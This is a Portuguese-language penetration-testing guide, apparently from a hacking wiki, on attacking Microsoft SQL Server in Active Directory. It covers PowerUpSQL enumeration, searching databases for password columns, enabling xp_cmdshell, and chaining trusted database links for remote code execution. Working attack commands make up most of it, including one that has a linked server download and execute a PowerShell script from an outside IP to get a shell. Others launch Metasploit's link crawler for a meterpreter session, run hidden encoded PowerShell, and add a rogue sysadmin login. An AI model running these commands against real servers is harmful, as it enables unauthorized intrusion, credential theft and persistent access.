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# Abuso do MSSQL AD
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## **Enumeração / Descoberta do MSSQL**
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O módulo powershell [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL ) é muito útil nesse caso.
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```powershell
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Import-Module .\PowerupSQL.psd1
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```
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### Enumerando a partir da rede sem sessão de domínio
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```powershell
# Get local MSSQL instance (if any)
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Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP – Verbose – Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
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```
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### Enumerando de dentro do domínio
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```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
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#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
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Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
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#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
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# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
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## Uso Básico do MSSQL
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### Acessar Banco de Dados
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```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
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#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
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# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
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```
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### MSSQL RCE
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Também pode ser possível **executar comandos** dentro do host MSSQL
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```powershell
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Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
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# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
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### Truques Básicos de Hacking do MSSQL
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Verifique na página mencionada na **seção seguinte como fazer isso manualmente.**
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{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server ](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ )
{% endcontent-ref %}
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## Links Confiáveis do MSSQL
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Se uma instância do MSSQL é confiável (link de banco de dados) por uma instância diferente do MSSQL. Se o usuário tiver privilégios sobre o banco de dados confiável, ele será capaz de **usar o relacionamento de confiança para executar consultas também na outra instância** . Essas confianças podem ser encadeadas e, em algum momento, o usuário pode ser capaz de encontrar algum banco de dados mal configurado onde ele pode executar comandos.
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**Os links entre bancos de dados funcionam mesmo através de confianças entre florestas.**
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### Abuso do Powershell
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```powershell
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#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
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#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
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Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
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#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "< INSTANCE1 > " -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "< INSTANCE2 > "'
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#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv – Verbose – Instance "SQLServer1\Instance1"
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#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
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## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
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```
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### Metasploit
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Você pode facilmente verificar links confiáveis usando o metasploit.
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```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
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Observe que o metasploit tentará abusar apenas da função `openquery()` no MSSQL (portanto, se você não puder executar comandos com `openquery()` , precisará tentar o método `EXECUTE` **manualmente** para executar comandos, veja mais abaixo.)
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### Manual - Openquery()
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Do **Linux** você poderia obter um shell de console MSSQL com **sqsh** e **mssqlclient.py.**
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Do **Windows** você também poderia encontrar os links e executar comandos manualmente usando um **cliente MSSQL como** [**HeidiSQL** ](https://www.heidisql.com )
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_Login usando autenticação do Windows:_
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![](< .. / . . / . gitbook / assets / image ( 167 ) ( 1 ) . png > )
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#### Encontrar Links Confiáveis
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```sql
select * from master..sysservers
```
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![](< .. / . . / . gitbook / assets / image ( 168 ) . png > )
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#### Executar consultas em link confiável
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Execute consultas através do link (exemplo: encontrar mais links na nova instância acessível):
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```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
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Verifique onde as aspas duplas e simples são usadas, é importante usá-las dessa maneira.
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{% endhint %}
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![](< .. / . . / . gitbook / assets / image ( 169 ) . png > )
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Você pode continuar essa cadeia de links confiáveis para sempre manualmente.
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```sql
# First level RCE
SELECT * FROM OPENQUERY("< computer > ", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("< computer2 > ", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
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Se não for possível realizar ações como `exec xp_cmdshell` a partir de `openquery()` , tente com o método `EXECUTE` .
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### Manual - EXECUTE
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Você também pode abusar de links confiáveis usando `EXECUTE` :
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```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
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## Escalação de Privilégios Local
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O usuário local do **MSSQL** geralmente possui um tipo especial de privilégio chamado ** `SeImpersonatePrivilege` **. Isso permite que a conta "impersonate a client after authentication" (impersonar um cliente após autenticação).
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Uma estratégia que muitos autores desenvolveram é forçar um serviço **SYSTEM** a se autenticar em um serviço falso ou de intermediário criado pelo atacante. Esse serviço falso é então capaz de se passar pelo serviço **SYSTEM** enquanto ele tenta se autenticar.
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[SweetPotato ](https://github.com/CCob/SweetPotato ) possui uma coleção dessas várias técnicas que podem ser executadas por meio do comando `execute-assembly` do Beacon.